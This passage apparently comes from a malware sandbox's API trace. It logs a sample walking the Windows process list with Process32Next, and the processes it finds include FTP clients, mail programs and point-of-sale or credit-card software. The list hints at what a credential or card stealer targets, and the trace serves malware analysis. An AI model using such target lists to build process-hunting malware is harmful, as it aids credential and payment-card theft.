| out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.065] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.067] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.123] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.125] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.127] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.129] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.143] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.165] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.168] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.170] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.172] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.174] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.176] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.178] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.179] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0242.181] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.183] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0242.185] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.187] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0242.230] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0242.233] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0242.236] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0242.238] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0242.241] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0242.245] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.248] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.250] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0242.254] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.257] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.260] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.262] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.265] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.321] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0242.324] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0242.326] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0242.329] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0242.332] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0242.334] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0242.336] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0242.338] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0242.341] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0242.344] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0242.347] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0242.349] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0242.351] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0242.353] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0242.355] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0242.399] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0242.401] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0242.404] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0242.406] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0242.408] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0242.411] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0242.414] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0242.417] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0242.419] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0242.422] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0242.425] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0242.428] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0242.430] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0242.433] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0242.438] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0242.440] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0242.443] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0242.447] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0242.450] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0242.452] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0242.455] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0242.458] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0242.460] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0242.463] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0242.465] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0242.468] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0242.473] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0242.480] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0242.482] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0242.485] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0242.488] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0242.491] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0242.493] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0242.496] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0242.499] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0242.502] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0242.505] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 